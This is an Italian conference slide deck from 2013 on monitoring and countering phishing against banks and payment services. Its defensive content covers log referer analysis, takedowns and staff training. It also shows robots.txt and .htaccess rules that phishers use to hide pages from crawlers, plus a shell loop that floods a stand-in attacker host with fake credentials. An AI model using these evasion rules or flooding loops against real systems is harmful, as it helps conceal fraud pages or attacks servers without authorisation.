�ݺ�ߣ

Phishing:
monitoraggio e contrasto.
I possibili approcci e le reali possibilitA'
Torino 30 maggio 2013
Denis Frati

Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 1
Frode utenti Telepass
21-6-2012: 50 cc validi luhn
Frode utenti Poste Pay
14-11-2012: 17 cc validi luhn
Frode utenti PayPal 15-11-2012:
5 cc validi luhn
Frode Agip/Eni 19-11-2012: 17
cc validi luhn
Frode utenti Visa 20-11-2012:
23 cc validi luhn
ecc... ecc... ecc...

Il phishing non e' la truffa degli sciocchi!!

Denis Frati – D3Lab
Www.d3lab.net



Il phishing non e' solo bancario – 1
(social network)

Www.d3lab.net



(e-mail account)

Www.d3lab.net



(On-line game)

Www.d3lab.net



… Se ne frega dell'otp

Www.d3lab.net



… Perche' gli bastano le carte di credito - 1

Www.d3lab.net



… Perche' gli bastano le
carte di credito - 2

Www.d3lab.net



… o l'accesso agli account in cui reperirle

Www.d3lab.net


Generalita'
Il Phishing è:
●
●
●
●

di semplice attuazione;
poco dispendioso;
trans-frontaliero;
a basso rischio;

si avvantaggia di:
●
●
●

Www.d3lab.net

ampio bacino vittime;
innumerevoli target;
pericolosità sottostimata;


Di cosa necessita' il phisher ? - 1
- Il kit Kit di phishing:
l'insieme di pagine html/htm,
php ed immagini, riproducenti
quelle dell'ente target.
<--- li fanno e
li vendono

Www.d3lab.net


- liste di indirizzi mail & mail server Liste di indirizzi email a cui
inviare le mail fraudolente.
Sistema invio mail:
●
●
●
●

Www.d3lab.net

mail sender php;
server di posta violati;
macchine compromesse;
connessioni wireless
aperta;


- SPAZIO di hosting Spazio di hosting:
●
●
●
●

Www.d3lab.net

gratuito;
a pagamento;
sito violato;
sulla propria macchina +
dns dinamico;


FUNZIOnamento base

3

2
1

6

4
5
6

Www.d3lab.net


Previsioni, preveggenza, vaticinio ???

Www.d3lab.net


monitoraggio
Undergorund & cyber crime intelligence

False pagine web on-line

Attack spread

Provenienza
Profili utente

Www.d3lab.net


Monitoraggio
Undergorund & cyber crime intelligence
Tra il dire ed il fare …
sono necessari:
●
●
●
●
●
●
●

struttura;
risorse umane;
tempo
conoscenza degli “ambienti”
storico: profili, attività, partecipazioni, conoscenze
referenze;
ecc;

… non basta iscriversi ad un forum/blog underground,
frequentare saltuariamente un canale irc su un server .ru

Www.d3lab.net


Monitoraggio
Presenza false pagine web on-line
●
●

●

●

il phishing è dinamico, veloce!
raramente sono presenti collegamenti a
pagine web indicizzate;
l'indicizzazione è spesso successiva alle prime
segnalazioni di frode;
il phisher conosce benissimo e usa:
➔
➔

robot.txt;
htaccess;

User-agent: *
Disallow: /folder1/
User-Agent: Googlebot
Disallow: /folder2/
RewriteEngine On
...
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^.* - [F,L]

Www.d3lab.net


Monitoraggio
ATTACK spread
●

falsificazione degli header della mail

Notifica mancati recapiti ->WARNING
un diluvio di notifiche che può anche mettere
in crisi il web server

Return-Path: <info@mycompany.it>
●

invio massiccio di mail anche a indirizzi
inesistenti

sono necessari:
●
monitoraggio data-base on line;
●
mail box civetta;
●
segnalatori (spesso i clienti verso filiali);
… buongiorno ho visto la mail per il concorso,
quello del bonus per la ricarica

addestrare il personale
a ricevere le segnalazioni

… scusi mi avete scritto per un mio conto ...ma
io non sono vostro cliente ….

Www.d3lab.net

Scusi?? mi spieghi bene, …
…mi inoltri la mail,
…può inviarmi il sorgente della
mail?


Monitoraggio
Monitorare la provenienza - 1
188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820
"http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03;
Windows ME) Opera 5.11 [en]"
Source Ip address: 188.216.109.13
Data: [25/May/2013:17:30:46 -0700]
Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"
Risposta server: 200 6820
Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"
User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
from http://httpd.apache.org/docs/2.2/logs.html

la vittima viene rimandata a specifiche pagine legittime;
noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no
*.mycompany.com, ecc..)

Www.d3lab.net


Dal Monitoraggio al contrasto
Attraverso Monitoraggio provenienza
referer pericoloso
su pagina login

azioni di verifica diretta

identifico
cliente

confronto profilo cliente
ulteriori verifiche

rilevo IP possibile
vittima

Frode ?

Y
fatto login ?
N

Y
blocco account
blocco operatività

1- test security company, curiosi, casuale, ecc
2- cliente che non prosegue con login

Www.d3lab.net

N

Evento >> log.db


contrasto
Richieste shutdown
Eliminare le pagine web fraudolente è imperativo, ma …
… realisticamente i mezzi sono pochi!
Si inoltrano le richieste a:
● gestori siti web;
● gestori server;
● hoster;
● fornitori connettività;
Tuttavia permangono problemi dovuti a:
● orari, fusi orari e festività;
● difficoltà contatto;
● servizi whois privacy;
● incomprensioni linguistiche;
● diffidenza;

Www.d3lab.net


Contrasto - Richieste shutdown – PLAYNG WITH
redirect

Www.d3lab.net


Contrasto - Richieste shutdown
PLAYNG WITH DYNAMIC DNS & fake sub domain
I servizi di DNS dinamico permettono al
criminale di:
● creare domini con nomi ingannevoli;
● mantenere le strutture/pagine web al
sicuro su proprie macchine connesse
in rete via SIM card
● celare la reale posizione delle pagine
- É necessario tracciare gli indirizzi IP
correlati ai domini
- intervenire
•
con corretti titolari degli IP
•
Fornitori servizio Dyn DNS

Il criminale:
● aggredisce il sito A;
● accede al pannello digestione
domini/DNS
● imposta subdomini con wild card;
● aggredisce il sito B
● inocula le pagine fraudolente
● dirotta su di esse i subdomini di A
www.post4.it.sitobucato.com
È necessario intervenire con tutte le
parti:
● gestori dei siti A & B
● hoster dei siti A & B
● fornitori connettività A & B;

Www.d3lab.net


contrasto
Credentials bombing
Le credenziali rubate vengono:
● spedite via mail al criminale;
● scritte su file di testo (locali o remoti);
● scritte in db remoti;

Ehi Cattivo?!?! Vuoi le credenziali ???
Eccole!!
A=1
while [ $A -eq 1 ]
do
wget/curl http://attacksite.com/login.php?user&pass&pin
done

Www.d3lab.net


contrasto
Credentials search
Se le credenziali sono scritte su file possono
essere individuate !!

Però lo sanno anche loro e
le scrivono in /tmp che
leggono via shell remote

Www.d3lab.net


contrasto
kit search
L'individuazione del kit mi consente di
● Sapere dove (presumibilmente) finiscono
le credenziali;
● Profilare il possibile utilizzatore o autore
del kit;
● Conoscere la propria pagina da
monitorare nei log http per i referer non
trusted;
● Conoscere le proprie risorse (immagini,
applet flash, css, ecc...) usate dei
criminali per bloccarle;

Www.d3lab.net


contrasto
I WANT TO BE BAD! - 1
Hai trovato una shell remota!!!
Grida di giubilio!!
Puoi entrare e sderenarli!!

Www.d3lab.net


contrasto
Ricorda:
vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?
Commetti almeno un reato
Art. 615 ter. C.p.(accesso abusivo a sistem informatico)
se non due
Art. 617 quinquies. C.p. (danneggiamento sistema informatico).
E le responsabilità aziendali ?!?!
Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché
acquisiste in modo illecito!

Www.d3lab.net


contrasto
Ricorda:
puoi accedere (illecitamente) allo spazio usato dal criminale,
cancellare i suoi file, le pagine web fraudolente, ma …
… se la vulnerabilità che ha permesso l'accesso al criminale permane..
NON HAI RISOLTO MOLTO.
È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la
porta è ancora aperta!

Www.d3lab.net


Monitoraggio & Analisi a tutto campo
Basi del contrasto
Un monitoraggio ampio e continuo
permette:
● Rilevare cambi di modalità operativa;
● Individuare nuove piattaforme bersaglio
per inoculazione;
● Conoscere nomi dei file di credenziali e
delle shell remote;
● Individuare i kit;
● Riconoscere la “firma” degli autori e
profilarli;
● Individuare nell'analisi attacchi a non
clienti tracce di attacco a clienti;
● Ipotizzare possibili futuri enti bersaglio.

Www.d3lab.net


Previsioni, preveggenza, vaticinio ???
Il monitoraggio a largo raggio fornisce indicazioni
sugli orientamenti dei phisher:
es. agosto 2012 rilavati attacchi a EDF (fornitore
energia francese)
Fine 2012 attacchi a Gruppo, Agip/Eni
es. agosto 2012 attacchi BNP-PARIBAS (DE)
Autunno 2012 attacchi BNP-PARIBAS (IT)
Maggio 2013 attacchi BNP-PARIBAS (ES)
es:fine 2012 attacchi Deteuche Bank IT
1° quadr. 2013 attacchi Deteuche Bank (DE)
Phishing forecast: chi verrà attaccato nei prossimi giorni?
www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher

Www.d3lab.net


contrasto
formazione
La (in)formazione del cliente può
avere un buon ritorno di immagine, a
costi contenuti.
Gli avvisi sulle pagine web non li
legge nessuno,ancor meno i deplian.
La formazione degli utenti interni, dei
dipendenti, porta solo sicurezza.
Kevin Mitnick parlava di formazione
aziendale a contrasto dall'ingegneria
sociale già nel 2002 (l'arte
dell'inganno).

Www.d3lab.net


domande

Www.d3lab.net


Contatti:
d3lab ~ $ whois denisfrati
Registrant Info:
Registrant: denis frati
Mail address: info@d3lab.net
Company: D3Lab
Address: Ivrea (TO) – V. Jervis, 4
Phone: +39-0125-1963370
Fax: +39-0125-1963371
Compeny web site: www.d3lab.net
Personal web site: www.denisfrati.it
Expires on..............: never
Last modified on........: 2012-02-20

Www.d3lab.net

�ݺ�ߣ

Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

More Related Content

Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità